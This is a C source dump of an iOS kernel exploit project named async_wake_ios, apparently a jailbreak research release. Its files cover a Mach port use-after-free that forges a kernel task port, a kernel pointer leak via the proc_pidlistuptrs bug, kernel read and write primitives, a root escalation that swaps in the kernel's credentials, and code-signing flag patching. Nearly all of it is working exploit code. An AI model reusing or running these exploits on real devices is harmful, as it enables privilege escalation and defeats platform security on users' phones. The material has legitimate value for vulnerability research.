bits); 417 | 418 | printf("about to test new tfp0\n"); 419 | 420 | vm_offset_t data_out = 0; 421 | mach_msg_type_number_t out_size = 0; 422 | err = mach_vm_read(tfp0, vm_map, 0x40, &data_out, &out_size); 423 | if (err != KERN_SUCCESS) { 424 | printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err)); 425 | sleep(3); 426 | exit(EXIT_FAILURE); 427 | } 428 | 429 | printf("kernel read via second tfp0 port worked?\n"); 430 | printf("0x%016llx\n", *(uint64_t*)data_out); 431 | printf("0x%016llx\n", *(uint64_t*)(data_out+8)); 432 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x10)); 433 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x18)); 434 | 435 | return tfp0; 436 | } 437 | 438 | 439 | 440 | // task_self_addr points to the struct ipc_port for our task port 441 | uint64_t find_kernel_vm_map(uint64_t task_self_addr) { 442 | uint64_t struct_task = rk64(task_self_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 443 | 444 | while (struct_task != 0) { 445 | uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)); 446 | 447 | uint32_t pid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID)); 448 | 449 | if (pid == 0) { 450 | uint64_t vm_map = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)); 451 | return vm_map; 452 | } 453 | 454 | struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV)); 455 | } 456 | 457 | printf("unable to find kernel task...\n"); 458 | sleep(10); 459 | exit(EXIT_FAILURE); 460 | } 461 | 462 | const uint64_t context_magic = 0x1214161800000000; // a random constant 463 | const uint64_t initial_context = 0x1020304015253545; // another random constant 464 | 465 | mach_port_t get_kernel_memory_rw() { 466 | // offsets are required before we get r/w: 467 | offsets_init(); 468 | 469 | kern_return_t err; 470 | 471 | uint32_t MAX_KERNEL_TRAILER_SIZE = 0x44; 472 | uint32_t replacer_body_size = message_size_for_kalloc_size(4096) - sizeof(mach_msg_header_t); 473 | uint32_t message_body_offset = 0x1000 - replacer_body_size - MAX_KERNEL_TRAILER_SIZE; 474 | 475 | printf("message size for kalloc.4096: %d\n", message_size_for_kalloc_size(4096)); 476 | 477 | prepare_user_client(); 478 | 479 | uint64_t task_self = task_self_addr(); 480 | if (task_self == 0) { 481 | printf("unable to disclose address of our task port\n"); 482 | sleep(10); 483 | exit(EXIT_FAILURE); 484 | } 485 | printf("our task port is at 0x%llx\n", task_self); 486 | 487 | int n_pre_ports = 100000; //8000 488 | mach_port_t* pre_ports = prepare_ports(n_pre_ports); 489 | 490 | // make a bunch of smaller allocations in a different zone which can be collected later: 491 | uint32_t smaller_body_size = message_size_for_kalloc_size(1024) - sizeof(mach_msg_header_t); 492 | 493 | uint8_t* smaller_body = malloc(smaller_body_size); 494 | memset(smaller_body, 'C', smaller_body_size); 495 | 496 | const int n_smaller_ports = 600; // 150 MB 497 | mach_port_t smaller_ports[n_smaller_ports]; 498 | for (int i = 0; i < n_smaller_ports; i++) { 499 | smaller_ports[i] = send_kalloc_message(smaller_body, smaller_body_size); 500 | } 501 | 502 | // now find a suitable port 503 | // we'll replace the port with an ipc_kmsg buffer containing controlled data, but we don't 504 | // completely control all the data: 505 | // specifically we're targetting kalloc.4096 but the message body will only span 506 | // xxx448 -> xxxfbc so we want to make sure the port we target is within that range 507 | // actually, since we're also putting a fake task struct here and want 508 | // the task's bsd_info pointer to overlap with the ip_context field we need a stricter range 509 | 510 | 511 | int ports_to_test = 100; 512 | int base = n_pre_ports - 1000; 513 | 514 | mach_port_t first_port = MACH_PORT_NULL; 515 | uint64_t first_port_address = 0; 516 | 517 | for (int i = 0; i < ports_to_test; i++) { 518 | mach_port_t candidate_port = pre_ports[base+i]; 519 | uint64_t candidate_address = find_port_address(candidate_port, MACH_MSG_TYPE_MAKE_SEND); 520 | uint64_t page_offset = candidate_address & 0xfff; 521 | if (page_offset > 0xa00 && page_offset < 0xe80) { // this range could be wider but there's no need 522 | printf("found target port with suitable allocation page offset: 0x%016llx\n", candidate_address); 523 | pre_ports[base+i] = MACH_PORT_NULL; 524 | first_port = candidate_port; 525 | first_port_address = candidate_address; 526 | break; 527 | } 528 | } 529 | 530 | if (first_port == MACH_PORT_NULL) { 531 | printf("unable to find a candidate port with a suitable page offset\n"); 532 | exit(EXIT_FAILURE); 533 | } 534 | 535 | 536 | uint64_t* context_ptr = NULL; 537 | uint8_t* replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, 0, 0, &context_ptr); 538 | printf("replacer_body_size: 0x%x\n", replacer_body_size); 539 | printf("message_body_offset: 0x%x\n", message_body_offset); 540 | 541 | make_dangling(first_port); 542 | 543 | free_ports(pre_ports, n_pre_ports); 544 | 545 | // free the smaller ports, they will get gc'd later: 546 | for (int i = 0; i < n_smaller_ports; i++) { 547 | mach_port_destroy(mach_task_self(), smaller_ports[i]); 548 | } 549 | 550 | 551 | // now try to get that zone collected and reallocated as something controllable (kalloc.4096): 552 | 553 | const int replacer_ports_limit = 200; // about 200 MB 554 | mach_port_t replacer_ports[replacer_ports_limit]; 555 | memset(replacer_ports, 0, sizeof(replacer_ports)); 556 | uint32_t i; 557 | for (i = 0; i < replacer_ports_limit; i++) { 558 | uint64_t context_val = (context_magic)|i; 559 | *context_ptr = context_val; 560 | replacer_ports[i] = send_kalloc_message(replacer_message_body, replacer_body_size); 561 | 562 | // we want the GC to actually finish, so go slow... 563 | pthread_yield_np(); 564 | usleep(10000); 565 | printf("%d\n", i); 566 | } 567 | 568 | 569 | // find out which replacer port it was 570 | mach_port_context_t replacer_port_number = 0; 571 | err = mach_port_get_context(mach_task_self(), first_port, &replacer_port_number); 572 | if (err != KERN_SUCCESS) { 573 | printf("unable to get context: %d %s\n", err, mach_error_string(err)); 574 | sleep(3); 575 | exit(EXIT_FAILURE); 576 | } 577 | replacer_port_number &= 0xffffffff; 578 | if (replacer_port_number >= (uint64_t)replacer_ports_limit) { 579 | printf("suspicious context value, something's wrong %lx\n", replacer_port_number); 580 | sleep(3); 581 | exit(EXIT_FAILURE); 582 | } 583 | 584 | printf("got replaced with replacer port %ld\n", replacer_port_number); 585 | 586 | prepare_rk_via_kmem_read_port(first_port); 587 | 588 | uint64_t kernel_vm_map = find_kernel_vm_map(task_self); 589 | printf("found kernel vm_map: 0x%llx\n", kernel_vm_map); 590 | 591 | 592 | // now free first replacer and put a fake kernel task port there 593 | // we need to do this becase the first time around we don't know the address 594 | // of ipc_space_kernel which means we can't fake a port owned by the kernel 595 | free(replacer_message_body); 596 | replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, kernel_vm_map, ipc_space_kernel(), &context_ptr); 597 | 598 | // free the first replacer 599 | mach_port_t replacer_port = replacer_ports[replacer_port_number]; 600 | replacer_ports[replacer_port_number] = MACH_PORT_NULL; 601 | mach_port_destroy(mach_task_self(), replacer_port); 602 | 603 | const int n_second_replacer_ports = 10; 604 | mach_port_t second_replacer_ports[n_second_replacer_ports]; 605 | 606 | for (int i = 0; i < n_second_replacer_ports; i++) { 607 | *context_ptr = i; 608 | second_replacer_ports[i] = send_kalloc_message(replacer_message_body, replacer_body_size); 609 | } 610 | 611 | // hopefully that worked the second time too! 612 | // check the context: 613 | 614 | replacer_port_number = 0; 615 | err = mach_port_get_context(mach_task_self(), first_port, &replacer_port_number); 616 | if (err != KERN_SUCCESS) { 617 | printf("unable to get context: %d %s\n", err, mach_error_string(err)); 618 | sleep(3); 619 | exit(EXIT_FAILURE); 620 | } 621 | 622 | replacer_port_number &= 0xffffffff; 623 | if (replacer_port_number >= (uint64_t)n_second_replacer_ports) { 624 | printf("suspicious context value, something's wrong %lx\n", replacer_port_number); 625 | sleep(3); 626 | exit(EXIT_FAILURE); 627 | } 628 | 629 | printf("second time got replaced with replacer port %ld\n", replacer_port_number); 630 | 631 | // clear up the original replacer ports: 632 | for (int i = 0; i < replacer_ports_limit; i++) { 633 | mach_port_destroy(mach_task_self(), replacer_ports[i]); 634 | } 635 | 636 | // then clear up the second replacer ports (apart from the one in use) 637 | mach_port_t second_replacement_port = second_replacer_ports[replacer_port_number]; 638 | second_replacer_ports[replacer_port_number] = MACH_PORT_NULL; 639 | for (int i = 0; i < n_second_replacer_ports; i++) { 640 | mach_port_destroy(mach_task_self(), second_replacer_ports[i]); 641 | } 642 | 643 | printf("will try to read from second port (fake kernel)\n"); 644 | // try to read some kernel memory using the second port: 645 | vm_offset_t data_out = 0; 646 | mach_msg_type_number_t out_size = 0; 647 | err = mach_vm_read(first_port, kernel_vm_map, 0x40, &data_out, &out_size); 648 | if (err != KERN_SUCCESS) { 649 | printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err)); 650 | sleep(3); 651 | exit(EXIT_FAILURE); 652 | } 653 | 654 | printf("kernel read via fake kernel task port worked?\n"); 655 | printf("0x%016llx\n", *(uint64_t*)data_out); 656 | printf("0x%016llx\n", *(uint64_t*)(data_out+8)); 657 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x10)); 658 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x18)); 659 | 660 | prepare_rwk_via_tfp0(first_port); 661 | printf("about to build safer tfp0\n"); 662 | 663 | //early_kalloc(0x10000); 664 | //return 0; 665 | 666 | mach_port_t safer_tfp0 = build_safe_fake_tfp0(kernel_vm_map, ipc_space_kernel()); 667 | prepare_rwk_via_tfp0(safer_tfp0); 668 | 669 | printf("built safer tfp0\n"); 670 | printf("about to clear up\n"); 671 | 672 | // can now clean everything up 673 | wk32(first_port_address + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_BITS_ACTIVE | IKOT_NONE); 674 | wk64(first_port_address + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), 0); 675 | 676 | // first port will soon point to freed memory, so neuter it: 677 | uint64_t task_port_addr = task_self_addr(); 678 | uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 679 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 680 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 681 | 682 | uint32_t port_index = first_port >> 8; 683 | const int sizeof_ipc_entry_t = 0x18; 684 | 685 | // remove all rights 686 | wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, 0); 687 | 688 | // clear the ipc_port port too 689 | wk64(is_table + (port_index * sizeof_ipc_entry_t), 0); 690 | 691 | mach_port_destroy(mach_task_self(), second_replacement_port); 692 | printf("cleared up\n"); 693 | return safer_tfp0; 694 | } 695 | 696 | char* bundle_path() { 697 | CFBundleRef mainBundle = CFBundleGetMainBundle(); 698 | CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle); 699 | int len = 4096; 700 | char* path = malloc(len); 701 | 702 | CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len); 703 | 704 | return path; 705 | } 706 | 707 | /* thx ianbeer for async_wake 708 | proc_for_pid based on cheesecakeufo code 709 | find bsd_info from our own task_self_addr */ 710 | uint64_t proc_for_pid(uint32_t pid) { 711 | uint64_t task_self = task_self_addr(); 712 | uint64_t struct_task = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 713 | 714 | while (struct_task != 0) { 715 | uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)); 716 | uint32_t fpid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID)); 717 | 718 | if (fpid == pid) { 719 | return bsd_info; 720 | } 721 | struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV)); 722 | } 723 | printf("unable to find bsd_info for given pid ...\n"); 724 | sleep(10); 725 | exit(EXIT_FAILURE); 726 | } 727 | 728 | uint64_t get_root(){ 729 | uint64_t bsd_task=proc_for_pid(getpid()); 730 | uint64_t cred = rk64(bsd_task+0x100); 731 | 732 | uint64_t credpatch = 0; 733 | uint64_t proc = bsd_task; 734 | while (proc) { 735 | uint32_t pid = rk32(proc+0x10); 736 | uint32_t csflags = rk32(proc+0x2a8); 737 | csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW; 738 | csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD); 739 | wk32(proc+0x2a8, csflags); 740 | if (pid == 0) { 741 | credpatch = rk64(proc+0x100); 742 | break; 743 | } 744 | proc = rk64(proc); 745 | } 746 | uint64_t orig_cred = cred; 747 | wk64(bsd_task+0x100, credpatch); 748 | printf("[INFO]: new uid: %d\n", getuid()); 749 | return orig_cred; 750 | } 751 | 752 | void unroot(uint64_t orig_cred){ 753 | uint64_t bsd_task=proc_for_pid(getpid()); 754 | wk64(bsd_task+0x100, orig_cred); 755 | printf("[INFO]: new uid: %d\n", getuid()); 756 | } 757 | 758 | mach_port_t go() { 759 | mach_port_t tfp0 = get_kernel_memory_rw(); 760 | printf("tfp0: %x\n", tfp0); 761 | 762 | /** 763 | 764 | We can now temporarily gain uid=0! I think we have to swap back to the old uid to prevent kernel panics though. 765 | 766 | Usage: 767 | - call get_root() and store the uid it returns. 768 | - do root stuff 769 | - setuid(old_uid) 770 | 771 | */ 772 | 773 | uint64_t orig_cred = get_root(); 774 | 775 | // do root stuff below 776 | 777 | /* 778 | To change your resolution: 779 | - Edit values in the .plist 780 | - Change the boolean below to true 781 | - Reboot 782 | 783 | You only have to do this once. BE CAREFUL, IT IS NOT MY FAULT IF YOU FUCK THIS UP 784 | */ 785 | bool shouldChangeResolution = false; 786 | 787 | if(shouldChangeResolution){ 788 | 789 | char ch; 790 | FILE *source, *target; 791 | char* path; 792 | asprintf(&path, "%s/com.apple.iokit.IOMobileGraphicsFamily.plist", bundle_path()); 793 | source = fopen(path, "r"); 794 | target = fopen("/var/mobile/Library/Preferences/com.apple.iokit.IOMobileGraphicsFamily.plist", "w"); 795 | 796 | while( ( ch = fgetc(source) ) != EOF ) 797 | fputc(ch, target); 798 | 799 | printf("Resolution changed, please reboot.\n"); 800 | fclose(source); 801 | fclose(target); 802 | } 803 | 804 | //set uid back 805 | unroot(orig_cred); 806 | sleep(2); 807 | 808 | if (probably_have_correct_symbols()) { 809 | printf("have symbols for this device, testing the kernel debugger...\n"); 810 | test_kdbg(); 811 | } 812 | 813 | return tfp0; 814 | } 815 | -------------------------------------------------------------------------------- /async_wake_ios/async_wake.h: -------------------------------------------------------------------------------- 1 | #ifndef async_wake_h 2 | #define async_wake_h 3 | 4 | #include 5 | mach_port_t go(void); 6 | 7 | #define CS_VALID 0x0000001 /* dynamically valid */ 8 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 9 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 10 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 11 | 12 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 13 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 14 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 15 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 16 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 17 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 18 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 19 | 20 | #define CS_ALLOWED_MACHO 0x00ffffe 21 | 22 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 23 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 24 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 25 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 26 | 27 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 28 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 29 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 30 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 31 | 32 | #endif /* async_wake_h */ 33 | -------------------------------------------------------------------------------- /async_wake_ios/com.apple.iokit.IOMobileGraphicsFamily.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | canvas_height 6 | 1136 7 | canvas_width 8 | 640 9 | 10 | 11 | -------------------------------------------------------------------------------- /async_wake_ios/early_kalloc.c: -------------------------------------------------------------------------------- 1 | // 2 | // early_kalloc.c 3 | // async_wake_ios 4 | // 5 | // Created by Ian Beer on 12/11/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | #include "early_kalloc.h" 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #include "find_port.h" 16 | #include "kmem.h" 17 | #include "symbols.h" 18 | 19 | extern int message_size_for_kalloc_size(int kalloc_size); 20 | 21 | // get a kalloc allocation before we've got a kcall interface to just call it 22 | uint64_t early_kalloc(int size) { 23 | mach_port_t port = MACH_PORT_NULL; 24 | kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 25 | if (err != KERN_SUCCESS) { 26 | printf("unable to allocate port\n"); 27 | } 28 | 29 | uint64_t port_kaddr = find_port_address(port, MACH_MSG_TYPE_MAKE_SEND); 30 | 31 | struct simple_msg { 32 | mach_msg_header_t hdr; 33 | char buf[0]; 34 | }; 35 | 36 | mach_msg_size_t msg_size = message_size_for_kalloc_size(size); 37 | struct simple_msg* msg = malloc(msg_size); 38 | memset(msg, 0, msg_size); 39 | 40 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 41 | msg->hdr.msgh_size = msg_size; 42 | msg->hdr.msgh_remote_port = port; 43 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 44 | msg->hdr.msgh_id = 0x41414142; 45 | 46 | err = mach_msg(&msg->hdr, 47 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 48 | msg_size, 49 | 0, 50 | MACH_PORT_NULL, 51 | MACH_MSG_TIMEOUT_NONE, 52 | MACH_PORT_NULL); 53 | 54 | if (err != KERN_SUCCESS) { 55 | printf("early kalloc failed to send message\n"); 56 | } 57 | 58 | // find the message buffer: 59 | 60 | uint64_t message_buffer = rk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE)); 61 | printf("message buffer: %llx\n", message_buffer); 62 | 63 | // leak the message buffer: 64 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE), 0); 65 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT), 0x50000); // this is two uint16_ts, msg_count and qlimit 66 | 67 | 68 | return message_buffer; 69 | } 70 | -------------------------------------------------------------------------------- /async_wake_ios/early_kalloc.h: -------------------------------------------------------------------------------- 1 | #ifndef early_kalloc_h 2 | #define early_kalloc_h 3 | 4 | #include 5 | 6 | uint64_t early_kalloc(int size); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /async_wake_ios/find_port.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | #include "find_port.h" 8 | #include "kmem.h" 9 | #include "symbols.h" 10 | #include "kutils.h" 11 | 12 | /* 13 | * this is an exploit for the proc_pidlistuptrs bug (P0 issue 1372) 14 | * 15 | * It will reliably determine the kernel address of a mach port. 16 | * Knowing the addresses of ports makes the other UaF exploit much simpler. 17 | */ 18 | 19 | // missing headers 20 | #define KEVENT_FLAG_WORKLOOP 0x400 21 | 22 | typedef uint64_t kqueue_id_t; 23 | 24 | struct kevent_qos_s { 25 | uint64_t ident; /* identifier for this event */ 26 | int16_t filter; /* filter for event */ 27 | uint16_t flags; /* general flags */ 28 | uint32_t qos; /* quality of service when servicing event */ 29 | uint64_t udata; /* opaque user data identifier */ 30 | uint32_t fflags; /* filter-specific flags */ 31 | uint32_t xflags; /* extra filter-specific flags */ 32 | int64_t data; /* filter-specific data */ 33 | uint64_t ext[4]; /* filter-specific extensions */ 34 | }; 35 | 36 | #define PRIVATE 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | struct kevent_extinfo { 43 | struct kevent_qos_s kqext_kev; 44 | uint64_t kqext_sdata; 45 | int kqext_status; 46 | int kqext_sfflags; 47 | uint64_t kqext_reserved[2]; 48 | }; 49 | 50 | extern int kevent_id(uint64_t id, const struct kevent_qos_s *changelist, int nchanges, struct kevent_qos_s *eventlist, int nevents, void *data_out, size_t *data_available, unsigned int flags); 51 | 52 | int proc_list_uptrs(pid_t pid, uint64_t *buffer, uint32_t buffersize); 53 | 54 | // appends n_events user events onto this process's kevent queue 55 | static void fill_events(int n_events) { 56 | struct kevent_qos_s events_id[] = {{ 57 | .filter = EVFILT_USER, 58 | .ident = 1, 59 | .flags = EV_ADD, 60 | .udata = 0x2345 61 | }}; 62 | 63 | kqueue_id_t id = 0x1234; 64 | 65 | for (int i = 0; i < n_events; i++) { 66 | int err = kevent_id(id, events_id, 1, NULL, 0, NULL, NULL, 67 | KEVENT_FLAG_WORKLOOP | KEVENT_FLAG_IMMEDIATE); 68 | 69 | if (err != 0) { 70 | printf(" [-] failed to enqueue user event\n"); 71 | exit(EXIT_FAILURE); 72 | } 73 | 74 | events_id[0].ident++; 75 | } 76 | } 77 | 78 | int kqueues_allocated = 0; 79 | 80 | static void prepare_kqueue() { 81 | // ensure there are a large number of events so that kevent_proc_copy_uptrs 82 | // always returns a large number 83 | if (kqueues_allocated) { 84 | return; 85 | } 86 | fill_events(10000); 87 | printf(" [+] prepared kqueue\n"); 88 | kqueues_allocated = 1; 89 | } 90 | 91 | // will make a kalloc allocation of (count*8)+7 92 | // and only write to the first (count*8) bytes. 93 | // the return value is those last 7 bytes uninitialized bytes as a uint64_t 94 | // (the upper byte will be set to 0) 95 | static uint64_t try_leak(int count) { 96 | int buf_size = (count*8)+7; 97 | char* buf = calloc(buf_size+1, 1); 98 | 99 | int err = proc_list_uptrs(getpid(), (void*)buf, buf_size); 100 | 101 | if (err == -1) { 102 | return 0; 103 | } 104 | 105 | // the last 7 bytes will contain the leaked data: 106 | uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc 107 | 108 | return last_val; 109 | } 110 | 111 | struct ool_msg { 112 | mach_msg_header_t hdr; 113 | mach_msg_body_t body; 114 | mach_msg_ool_ports_descriptor_t ool_ports; 115 | }; 116 | 117 | // fills a kalloc allocation with count times of target_port's struct ipc_port pointer 118 | // To cause the kalloc allocation to be free'd mach_port_destroy the returned receive right 119 | static mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) { 120 | // allocate a port to send the message to 121 | mach_port_t q = MACH_PORT_NULL; 122 | kern_return_t err; 123 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 124 | if (err != KERN_SUCCESS) { 125 | printf(" [-] failed to allocate port\n"); 126 | exit(EXIT_FAILURE); 127 | } 128 | 129 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count); 130 | for (int i = 0; i < count; i++) { 131 | ports[i] = target_port; 132 | } 133 | 134 | struct ool_msg* msg = calloc(1, sizeof(struct ool_msg)); 135 | 136 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 137 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg); 138 | msg->hdr.msgh_remote_port = q; 139 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 140 | msg->hdr.msgh_id = 0x41414141; 141 | 142 | msg->body.msgh_descriptor_count = 1; 143 | 144 | msg->ool_ports.address = ports; 145 | msg->ool_ports.count = count; 146 | msg->ool_ports.deallocate = 0; 147 | msg->ool_ports.disposition = disposition; 148 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 149 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY; 150 | 151 | err = mach_msg(&msg->hdr, 152 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 153 | (mach_msg_size_t)sizeof(struct ool_msg), 154 | 0, 155 | MACH_PORT_NULL, 156 | MACH_MSG_TIMEOUT_NONE, 157 | MACH_PORT_NULL); 158 | 159 | if (err != KERN_SUCCESS) { 160 | printf(" [-] failed to send message: %s\n", mach_error_string(err)); 161 | exit(EXIT_FAILURE); 162 | } 163 | 164 | return q; 165 | } 166 | 167 | static int uint64_t_compare(const void* a, const void* b) { 168 | uint64_t a_val = (*(uint64_t*)a); 169 | uint64_t b_val = (*(uint64_t*)b); 170 | if (a_val < b_val) { 171 | return -1; 172 | } 173 | if (a_val == b_val) { 174 | return 0; 175 | } 176 | return 1; 177 | } 178 | 179 | uint64_t find_port_via_proc_pidlistuptrs_bug(mach_port_t port, int disposition) { 180 | prepare_kqueue(); 181 | 182 | int n_guesses = 100; 183 | uint64_t* guesses = calloc(1, n_guesses*sizeof(uint64_t)); 184 | int valid_guesses = 0; 185 | 186 | for (int i = 1; i < n_guesses+1; i++) { 187 | mach_port_t q = fill_kalloc_with_port_pointer(port, i, disposition); 188 | mach_port_destroy(mach_task_self(), q); 189 | uint64_t leaked = try_leak(i-1); 190 | //printf("leaked %016llx\n", leaked); 191 | 192 | // a valid guess is one which looks a bit like a kernel heap pointer 193 | // without the upper byte: 194 | if ((leaked < 0x00ffffff00000000) && (leaked > 0x00ffff0000000000)) { 195 | guesses[valid_guesses++] = leaked | 0xff00000000000000; 196 | } 197 | } 198 | 199 | if (valid_guesses == 0) { 200 | printf(" [-] couldn't leak any kernel pointers\n"); 201 | exit(EXIT_FAILURE); 202 | } 203 | 204 | // return the most frequent guess 205 | qsort(guesses, valid_guesses, sizeof(uint64_t), uint64_t_compare); 206 | 207 | uint64_t best_guess = guesses[0]; 208 | int best_guess_count = 1; 209 | 210 | uint64_t current_guess = guesses[0]; 211 | int current_guess_count = 1; 212 | for (int i = 1; i < valid_guesses; i++) { 213 | if (guesses[i] == guesses[i-1]) { 214 | current_guess_count++; 215 | if (current_guess_count > best_guess_count) { 216 | best_guess = current_guess; 217 | best_guess_count = current_guess_count; 218 | } 219 | } else { 220 | current_guess = guesses[i]; 221 | current_guess_count = 1; 222 | } 223 | } 224 | 225 | //printf("best guess is: 0x%016llx with %d%% of the valid guesses for it\n", best_guess, (best_guess_count*100)/valid_guesses); 226 | 227 | free(guesses); 228 | 229 | return best_guess; 230 | } 231 | 232 | uint64_t find_port_via_kmem_read(mach_port_name_t port) { 233 | uint64_t task_port_addr = task_self_addr(); 234 | 235 | uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 236 | 237 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 238 | 239 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 240 | 241 | uint32_t port_index = port >> 8; 242 | const int sizeof_ipc_entry_t = 0x18; 243 | 244 | uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t)); 245 | return port_addr; 246 | } 247 | 248 | uint64_t find_port_address(mach_port_t port, int disposition) { 249 | if (have_kmem_read()) { 250 | return find_port_via_kmem_read(port); 251 | } 252 | return find_port_via_proc_pidlistuptrs_bug(port, disposition); 253 | } 254 | -------------------------------------------------------------------------------- /async_wake_ios/find_port.h: -------------------------------------------------------------------------------- 1 | #ifndef find_port_h 2 | #define find_port_h 3 | 4 | #include 5 | 6 | uint64_t find_port_address(mach_port_t port, int disposition); 7 | 8 | #endif /* find_port_h */ 9 | -------------------------------------------------------------------------------- /async_wake_ios/kcall.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "kcall.h" 8 | #include "kmem.h" 9 | #include "find_port.h" 10 | #include "kutils.h" 11 | #include "symbols.h" 12 | #include "early_kalloc.h" 13 | 14 | 15 | 16 | extern uint64_t 17 | iokit_user_client_trap( 18 | mach_port_t connect, 19 | unsigned int index, 20 | uintptr_t p1, 21 | uintptr_t p2, 22 | uintptr_t p3, 23 | uintptr_t p4, 24 | uintptr_t p5, 25 | uintptr_t p6 ); 26 | 27 | #if 0 28 | // OSSerializer::Serialize method 29 | // lets you pass two uint64_t arguments 30 | // no return value 31 | 32 | // a simple IOKit mig method 33 | extern void IOIteratorReset(mach_port_t port); 34 | 35 | struct fake_iokit_obj { 36 | uint64_t vtable; 37 | uint64_t refcount; // vtable +0x00 38 | uint64_t arg0; // vtable +0x08 39 | uint64_t arg1; // vtable +0x10 40 | uint64_t fptr; // vtable +0x18 41 | uint64_t retain; // vtable +0x20 42 | uint64_t release; // vtable +0x28 43 | uint64_t ign; // vtable +0x30 44 | uint64_t get_meta_class; // vtable +0x38 45 | }; 46 | 47 | // call fptr in the context of the current thread passing arg0 and arg1 48 | // uses the serializer gadget 49 | void kcall(uint64_t fptr, uint64_t arg0, uint64_t arg1) { 50 | // allocate some memory to hold a fake iokit object: 51 | uint64_t obj_kaddr = kmem_alloc(sizeof(struct fake_iokit_obj)+0x800); 52 | 53 | // fill in the fields: 54 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, vtable), obj_kaddr+0x08); // point this to the next field 55 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, refcount), 0x2017); 56 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, arg0), 